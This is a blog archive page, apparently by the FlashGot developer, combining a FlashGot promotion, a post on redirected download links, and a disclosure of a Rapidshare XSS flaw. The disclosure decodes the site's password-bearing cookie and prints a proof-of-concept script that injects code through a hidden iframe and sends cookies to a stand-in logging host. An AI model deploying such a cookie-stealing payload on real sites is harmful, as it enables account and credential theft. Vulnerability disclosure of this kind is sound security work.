Hurry, it's the best time to use FlashGot Media!
Adobe and movie providers might withdraw their generosity at any moment :)
Archive for the FlashGot CategoryHurry, it's the best time to use FlashGot Media!
Also released this week:
As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners. user=12345-%36%37%38%39%30
. cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Therefore, for a given cookie, access credentials are just var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);
This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink: var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" + escape(document.cookie); }) + ")()</scr" + "ipt>" var iframe = document.body.appendChild(document.createElement("iframe")); iframe.style.visibility = "hidden"; iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" + encodeURIComponent(injection); But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites... ;) UpdateFixed on 6 Aug 2008. A fresh FlashGot user emailed me yesterday asking for help: he had previously loaded thousands of URLs in FlashGet (the popular Chinese download manager), but later he found they were unusable for batch downloading because they where redirected through the anonym.to service: FlashGet was unable to follow the redirection and always downloaded the useless anonym.to interstitial page, instead of the real content. He had mass-imported them before hearing of FlashGot, using Internet Explorer's "Download all by FlashGet" menu item. In facts, FlashGot automatically works around many kinds of redirection and "link protection" services, either simple like tinyurl.com, which just uses a 302 HTTP response, or quite complex like link-protector.com, which deploys a JavaScript-based obfuscation schema. So this user wanted me to use my supposed knowledge of FlashGet internals to "hack" its database and replace the anonym.to URLs with the actual target addresses "post mortem", since in the meanwhile the page where he had grabbed the links originally had disappeared from the web, so he couldn't use "FlashGot Selection" anymore. But luckily enough, there's a fairly easy and general solution to this problem, thanks to the very simple structure of anonym.to URLs. They always come in the form http://anonym.to?http://www.destination-site.com
, therefore they can easily be rewritten on the fly by a local proxy.
I kept the rewrite rule extremely generic, working with every kind of redirected links having the destination HTTP URL somewhere in their query string -- not just anonym.to. |
Bad Behavior has blocked 3280 access attempts in the last 7 days.